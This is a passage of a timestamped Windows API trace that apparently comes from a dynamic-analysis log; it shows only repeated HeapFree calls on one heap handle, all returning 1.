hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.557] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.560] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.562] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.566] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.572] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.576] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.580] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.584] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0303.853] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0303.887] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0303.957] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0304.287] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0304.319] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0304.348] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0304.413] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0304.413] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0304.413] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0304.647] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0304.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0304.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0304.992] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0305.172] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0306.000] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.001] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0306.004] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.004] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.004] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0306.020] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.020] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0306.025] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.034] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.034] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.034] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.141] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.509] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0306.530] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41b3010 | out: hHeap=0x470000) returned 1 [0306.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0306.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0306.867] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0306.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0307.777] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0308.173] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0308.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.383] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.392] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.711] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.713] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.717] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.720] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.721] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.723] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.725] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.725] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.733] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.734] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.735] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.736] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.754] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.754] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0308.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.761] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.762] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.762] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.762] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.762] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0308.772] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0309.235] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0309.431] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0309.727] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0309.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0309.741] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.413] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.415] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.418] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0310.531] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0313.888] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0313.888] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.174] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.175] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0314.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0314.426] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.426] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0314.431] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.434] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.434] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.435] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.435] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0314.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0314.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.439] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.440] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0314.440] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0314.441] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.441] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0314.441] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.446] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0314.446] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.883] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0314.884] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0314.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0314.900] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0315.221] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.221] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.269] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.272] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.283] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.297] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.340] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.343] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0315.343] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.343] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.344] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.351] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.359] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.365] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.366] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0315.367] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.367] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.368] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.368] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0315.374] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.374] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.375] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.376] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.377] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.383] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.599] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.604] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.606] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.609] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.610] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.613] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.613] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.616] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.619] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.620] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.622] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.622] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.625] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.626] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.627] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.628] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.630] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.631] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.633] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.634] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.636] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.637] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.638] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0315.697] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.266] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.273] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.275] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.276] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.277] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.278] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.279] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.279] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.284] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.288] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.289] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.302] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.303] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.327] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0316.327] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.327] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.327] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.330] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0316.332] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0316.332] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0316.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: 